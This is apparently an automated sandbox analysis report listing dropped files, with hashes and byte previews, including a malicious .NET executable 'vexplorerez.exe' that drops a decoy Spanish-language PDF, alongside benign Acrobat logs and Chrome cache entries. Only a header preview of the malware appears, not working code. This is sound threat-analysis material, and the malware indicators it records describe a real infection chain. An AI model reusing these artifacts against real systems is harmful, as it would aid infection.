                                                                          SHA-512:55099B6F65D6EF41BC0C077BF810A13BA338C503974B4A5F2AA8EB286E1FCF49DF96318B1DA691296FB71AA8F2A2EA1406C4E86F219B40FB837F2E0BF208E677
                                                                          Malicious:false
                                                                          Preview:SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:066+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=e060408f-9833-415c-bd59-cc59ace6b516.1696488385066 Timestamp=2023-10-05T08:46:25:067+0200 ThreadID=6912 Component=ngl-lib_NglAppLib Description="SetConfig:

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with very long lines (392), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):15090
                                                                          Entropy (8bit):5.34238748028587
                                                                          Encrypted:false
                                                                          SSDEEP:384:Mp3oSIXLwPC06fhoPiyXe0vOqRYPA0oQB2r9PbOmD3jdPeR2ON/5YrYBA85aAPXg:V6Z
                                                                          MD5:C0D1ADEF644A783F9A90FAB9D4E41A72
                                                                          SHA1:F09116649C20B2EBE94DA0A1473228B908AAB9D9
                                                                          SHA-256:B187561D8A9A7A9BDCBE5ADE642C220B6F3466341F135E88C2A0C819527C0F7A
                                                                          SHA-512:D539632066038FAFEF06C11CDECAF018E7683BA3A3694441712227E21C521714D938108AE6986A48DD8D08E7346385D296AA2BA43BCBA3821657AB6048BD095C
                                                                          Malicious:false
                                                                          Preview:SessionID=359f7f62-93bc-4cee-9224-60a0a82d2463.1719471426512 Timestamp=2024-06-27T02:57:06:512-0400 ThreadID=6468 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=359f7f62-93bc-4cee-9224-60a0a82d2463.1719471426512 Timestamp=2024-06-27T02:57:06:512-0400 ThreadID=6468 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=359f7f62-93bc-4cee-9224-60a0a82d2463.1719471426512 Timestamp=2024-06-27T02:57:06:512-0400 ThreadID=6468 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=359f7f62-93bc-4cee-9224-60a0a82d2463.1719471426512 Timestamp=2024-06-27T02:57:06:512-0400 ThreadID=6468 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=359f7f62-93bc-4cee-9224-60a0a82d2463.1719471426512 Timestamp=2024-06-27T02:57:06:513-0400 ThreadID=6468 Component=ngl-lib_NglAppLib Description="SetConf

                                                                          C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):29752
                                                                          Entropy (8bit):5.397541900504483
                                                                          Encrypted:false
                                                                          SSDEEP:192:acb4I3dcbPcbaIO4cbYcbqnIdjcb6acbaIewcbWTcb4IyIcbp:V3fOCIdJDeVyP
                                                                          MD5:180D07EA1BC473089C67BD40CA99D40E
                                                                          SHA1:56369EE4869CE6E905431BEC4AED1F96E2CCC682
                                                                          SHA-256:15B8FA42D8142D373FE02DB340DE0BEAFBD139D1C0900F0A81449CA102E0842A
                                                                          SHA-512:F7E7BFF87F1CEBC1CE6CB25316927EE950494399A5A9120655A555B7CAE266A4013348AAC449BC1624C059C731C251772D94A562203A6DDEF805B1ED2929F559
                                                                          Malicious:false
                                                                          Preview:05-10-2023 08:20:22:.---2---..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 08:20:22:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 08:20:22:.Closing File..05-10-

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\8c27aa8f-1cae-4b85-972f-1da13a93e418.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                          Category:dropped
                                                                          Size (bytes):1419751
                                                                          Entropy (8bit):7.976496077007677
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
                                                                          MD5:95F182500FC92778102336D2D5AADCC8
                                                                          SHA1:BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
                                                                          SHA-256:9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
                                                                          SHA-512:D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\8c3cb5a7-61e9-4a74-acb9-f62cf002f5eb.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                          Category:dropped
                                                                          Size (bytes):1407294
                                                                          Entropy (8bit):7.97605879016224
                                                                          Encrypted:false
                                                                          SSDEEP:24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R077WLaGZ7wYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs03WLaGZw
                                                                          MD5:8B9FA2EC5118087D19CFDB20DA7C4C26
                                                                          SHA1:E32D6A1829B18717EF1455B73E88D36E0410EF93
                                                                          SHA-256:4782624EA3A4B3C6EB782689208148B636365AA8E5DAF00814FA9AB722259CBD
                                                                          SHA-512:662F8664CC3F4E8356D5F5794074642DB65565D40AC9FEA323E16E84EBD4F961701460A1310CC863D1AB38849E84E2142382F5DB88A0E53F97FF66248230F7B9
                                                                          Malicious:false
                                                                          Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\ae8f4cd4-4e37-4433-b581-711f489b4a5e.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                          Category:dropped
                                                                          Size (bytes):386528
                                                                          Entropy (8bit):7.9736851559892425
                                                                          Encrypted:false
                                                                          SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                          MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                          SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                          SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                          SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                          Malicious:false
                                                                          Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

                                                                          C:\Users\user\AppData\Local\Temp\acrocef_low\e362fa5c-6249-45c4-a39b-82e67414511e.tmp

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                          Category:dropped
                                                                          Size (bytes):758601
                                                                          Entropy (8bit):7.98639316555857
                                                                          Encrypted:false
                                                                          SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                          MD5:3A49135134665364308390AC398006F1
                                                                          SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                          SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                          SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                          Malicious:false
                                                                          Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

                                                                          C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\915DEAC5D1E15E49646B8A94E04E470958C9BB89.crl

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):85893
                                                                          Entropy (8bit):6.4285188239971465
                                                                          Encrypted:false
                                                                          SSDEEP:1536:Lh3s60i02RwxwFnZNt0zfIagnbSLDII+DY:LVs/i0C4IZN+gbE8pDY
                                                                          MD5:B7A9A5A223B9DCE0E7D10E2B32A0BA07
                                                                          SHA1:FFB925FA80873CF50D8CB6DA530BA8CD7F0D9922
                                                                          SHA-256:4EF52E63D45F5230C47DBD3764AA90768F708B24885579375724473BB3FFB255
                                                                          SHA-512:A46488535961F26B7E41E1BA98E2015627917366BE08B172B0A5377E5A4EC1C0BD14F1A4E2473B5831A7538B3554E818FE3349DA42C0F40E03B3474EC77532F4
                                                                          Malicious:false
                                                                          Preview:0..O.0..Mg...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240403114831Z..240410114831Z0..L.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!......S....fNj'.wy..210602000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210

                                                                          C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\CRLCache\DF22CF8B8C3B46C10D3D5C407561EABEB57F8181.crl

                                                                          Download File
                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):737
                                                                          Entropy (8bit):7.5099882082938105
                                                                          Encrypted:false
                                                                          SSDEEP:12:yeRLaWQMnFQlRmyOFfBS9i7u8meIHKbw2O9TrU/Y/QmpFlT1xaOu8OAbsHqvNDVk:y2GWnSmyOtci7umNbQ9TrUw/QmxT1xsD
                                                                          MD5:152F65AAA856C44E87C8ED561AE43C0F
                                                                          SHA1:B6440383DBC4D3446E91CBB58EEB8C8BD6671F50
                                                                          SHA-256:48AC59FC9FA38016B6D5A4CB5D89A2C0CABCD8A0404AF29FBE995B4AA647A292
                                                                          SHA-512:106287A2EA36511D229E6991638D99B796B24B05D4BC8AE75BE5E9B79EA7A324330A26B3B4028FC4A8523FB82D7E3F9A793AE0E9C1F377939956C5667E44381E
                                                                          Malicious:false
                                                                          Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240401194722Z..240422194722Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H............._..T...?..G).L/..K..5...3.j(..G.D0...>...bH.p.O{..Y....^.]I.G......~r.Ye...Sy...*..X...1........8'../...O...P;QO.-O.BUq......1s..(,....v....*L.q..H.6j %..R.p..H..).;vt.....6...r]/.....4.%....G....J..3Y.....d....N....tu...q....2.wm..$...d...w...G?..h.?.+E...$d.........80X45[...A.7,.....s`...sS.g.]...].i...y].bu.U.......AP....T.d!...eB.`...u.....Z....&.....*$mY..q7.;.5..s..x.$.._..5.W..F?p@.+Ud-...&'...po$..4R7L.`.g.......J...........h...M(./>)..;.g....B..F.?>...Q{%.i.....!lm||..cxb..

                                                                          C:\Users\user\AppData\Roaming\PABILOS MOTORES #5 Y 6.pdf

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Roaming\vexplorerez.exe
                                                                          File Type:PDF document, version 1.3, 1 pages
                                                                          Category:dropped
                                                                          Size (bytes):26507
                                                                          Entropy (8bit):7.813803154001479
                                                                          Encrypted:false
                                                                          SSDEEP:768:MOjgqbD1EAw5Sa7OJOo8gxraB21BiqKIA+hF:MagoD1EAuSumGgxraQe+X
                                                                          MD5:9CF473B9B836B8811841BEF458BD5474
                                                                          SHA1:F46E568C480C692F218F28C5066472D9AFFDA54D
                                                                          SHA-256:6B1411273CC92BE9697DB4C28034C98802E947563849FD441D71E6C768CC72C3
                                                                          SHA-512:8B2D4F7515F9F28C30C83D0BCC4BA119F2CC7F3F9C203E0E69FA3C1BF0E105CF0B36F6895917A0385174EFB659780211C620268E5CBEC59C36DD51D468ECF68B
                                                                          Malicious:false
                                                                          Preview:%PDF-1.3..%......4 0 obj..<<../Author (Author)../Keywords (keyword1, keyword2)../CreationDate (D:20240506185230Z)../Title (Title)../Creator (XSL-FO http://www.w3.org/1999/XSL/Format)../Subject (Subject)../Producer (Fonet, Version=1.0.0.0, Culture=neutral, PublicKeyToken=52effa152c4a9dc6, 1.0.0.0)..>>..endobj..5 0 obj..<<../Filter /FlateDecode../Length 3948..>>..stream..x^.\.r.J.}.W.13.}............f..ez...,..fq....d.*-..b.,.FB.u.dVVV...;+V1C......Bop..T.......@....W.)U...)....|i......pNt...zK.....?..K.Q5...5......F.S...?.^...Z..C...5J.....1...P....V.%.w..Wy...+..#BX...@.a..p.5.Ke.....*.....%N5.;.Rj.k...L5...jt..@.._..Ip4t';...... .U$ea.."...`.B..O[?......;......9.XC.f2.8.q|....]Di.>....c.],....^.A.].S5....=7K.J...7..\..IH.xk...... .n.K...Kw.....^d.V.UhZ.A|`..c.hLc...j|&...o"l.......=.....*....y.3....38....P0(AD=G..i..L.3...<.h...X..\.........;....pB.=./\..9..j...E\Wr.UA7[z.......+...:C1.S..4.*,..]:.o;....^.#w......2.......b..$.&..)...'`v..F.I...fBE.m.a`..;{

                                                                          C:\Users\user\AppData\Roaming\vexplorerez.exe

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):927744
                                                                          Entropy (8bit):7.034384979181059
                                                                          Encrypted:false
                                                                          SSDEEP:24576:nMm5SH6MIl3LkGDhsmD/U0haY/s9fXC7v:nMm5Lnl7kSUXYofXCj
                                                                          MD5:9B79CF9008F569169EBA09528BF1730C
                                                                          SHA1:7FDCC0FF2D1A8100ACBE2E4E0372734BB4396BC1
                                                                          SHA-256:ADA26DE90884FDF8D203297F5F5D2DB98C411CEBC7A8D36114F0B1EE2B413431
                                                                          SHA-512:2233AB1FE358915AD2C7DD3CDC406141CD52ECE73E5C05B51CAC3530DC9D7B59A7ED729831F66C18200EB9E0A672987749311D641FF5A1B31E84D797FA155AF0
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 68%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....J.I.........."...P..N..........nm... ........@.. ....................................`..................................m..S....................(.......`....................................................... ............... ..H............text...tM... ...N.................. ..`.rsrc................P..............@..@.reloc.......`.......&..............@..B................Pm......H...........p...........d...B......................................................c..@a....un..("...*&..(#....*.s$........s%........s&........s'........s(........*Z........o;...........*&..(<....*j..{....(...+}.....{....+.*...{......,.+.....,.rq..psA...z..|....(...+*&........*".......*Vs'...(F...t.........*..(G...*..(<...*&.{....+.*6..(=...}....*&.{@...+.*6..(=...}@...*&.{A...+.*6..(=...}A...*&.{B...+.*6..(=...}B...*&.{C...+.*6..(=...}C...*&.{D...+.*6..(=...}D...*&.{E...+.

                                                                          C:\Users\user\AppData\Roaming\vexplorerez.exe:Zone.Identifier

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0

                                                                          Chrome Cache Entry: 190

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):277414
                                                                          Entropy (8bit):5.111338036329316
                                                                          Encrypted:false
                                                                          SSDEEP:6144:REa6/7LY8CTCkXmN/UFbPms3JeL2yYp89uMuY1tE6v1pHe7Bbc2A4IM:3cUFbPjO4899lTHeNbc2pIM
                                                                          MD5:2BF49D80D39E784E004A785C3F6F1F54
                                                                          SHA1:92D0D5640F050F1A19D2D4CDD0417B2DAD926242
                                                                          SHA-256:9048FEA17EBE181D7510D6EC8D4763231CB5B54634F7EAC26F39C7876D38AA28
                                                                          SHA-512:CF29D2C71058DEA6B47A1D607DD4B321E8D343A743EC2331C46FC4FFBEBD46F14DDB0D704C0250766135D1F6F1C480E6EAE3135228007831DB4AECC1EC5524DE
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Scripts/Jquery/jquery-3.1.1.js
                                                                          Preview:/*!.. * jQuery JavaScript Library v3.1.1.. * https://jquery.com/.. *.. * Includes Sizzle.js.. * https://sizzlejs.com/.. *.. * Copyright jQuery Foundation and other contributors.. * Released under the MIT license.. * https://jquery.org/license.. *.. * Date: 2016-09-22T22:30Z.. */..( function( global, factory ) {....."use strict";.....if ( typeof module === "object" && typeof module.exports === "object" ) {......// For CommonJS and CommonJS-like environments where a proper `window`....// is present, execute the factory and get jQuery.....// For environments that do not have a `window` with a `document`....// (such as Node.js), expose a factory as module.exports.....// This accentuates the need for the creation of a real `window`.....// e.g. var jQuery = require("jquery")(window);....// See ticket #14549 for more info.....module.exports = global.document ?.....factory( global, true ) :.....function( w ) {......if ( !w.document ) {.......throw new Error( "jQuery requires a window with a do

                                                                          Chrome Cache Entry: 191

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                          Category:dropped
                                                                          Size (bytes):43
                                                                          Entropy (8bit):3.0314906788435274
                                                                          Encrypted:false
                                                                          SSDEEP:3:CUkwltxlHh/:P/
                                                                          MD5:325472601571F31E1BF00674C368D335
                                                                          SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                          SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                          SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                          Malicious:false
                                                                          Preview:GIF89a.............!.......,...........D..;

                                                                          Chrome Cache Entry: 192

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (951), with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):227537
                                                                          Entropy (8bit):4.692151556235474
                                                                          Encrypted:false
                                                                          SSDEEP:3072:NRhN1vRlALNa9tVNrUVe0hb2ISSWgtZgG5NJpmsjUKpU8qvLuZ:VvRlALNa9tVNGJt5lUK8LW
                                                                          MD5:E888A83B28C810EC7CBD565430577BA2
                                                                          SHA1:B4D3D33F61BC4F17C897804FF95BD7A271E4BA11
                                                                          SHA-256:908E5AD4259321A03B5619394D232A931F984A03C8C38ADCAD982A48F07FADA1
                                                                          SHA-512:F672D74A447511A5C5CEE3C76DC506CB68FC8E6DCC4850A3DF4A97008D3D40DBD7C2F8F969828F5AE092BB0B5AF96FA41C84C16AD717405727D7613FC52BA8F8
                                                                          Malicious:false
                                                                          URL:https://verificacfdi.facturaelectronica.sat.gob.mx/Content/main.css
                                                                          Preview:.@charset "UTF-8"; /*!.. * Bootstrap v3.3.5 (http://getbootstrap.com).. * Copyright 2011-2015 Twitter, Inc... * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE).. */ /*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.....label, sub, sup {.. vertical-align: baseline..}.....btn, .btn-group, .btn-group-vertical, .caret, .checkbox-inline, .radio-inline, img {.. vertical-align: middle..}....hr, img {.. border: 0..}....body, figure {.. margin: 0..}.....btn-group > .btn-group, .btn-toolbar .btn, .btn-toolbar .btn-group, .btn-toolbar .input-group, .col-xs-1, .col-xs-10, .col-xs-11, .col-xs-12, .col-xs-2, .col-xs-3, .col-xs-4, .col-xs-5, .col-xs-6, .col-xs-7, .col-xs-8, .col-xs-9, .dropdown-menu {.. float: left..}.....img-responsive, .img-thumbnail, .table, label {.. max-width: 100%..}.....navbar-fixed-bottom .navbar-collapse, .navbar-fixed-top .navbar-collapse, .pre-scrollable {.. max-height: 340px..}....html {.. fon

                                                                          Chrome Cache Entry: 193

                                                                          Download File
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):363
                                                                          Entropy (8bit):4.480200357031714
                                                                          Encrypted:false
                                                                          SSDEEP:6:y4QPhDz+fF3123R0jb/0xKfEOYnadZ8lF3fKA0J6Ay0Hoy2HpYlK:rQPhqFqR0n/0xQdkhDMy0IygpYk
                                                                          MD5:74D33189E095E90ADD36891D525F78DE
                                                                          SHA1:288B509060D96C25EF0CEC189403E415D4DF3F19
                                                                          SHA-256:DBACE1FF474F1D70C7204A62E83488310E20D698F074672E7C7A002E96AE93B5
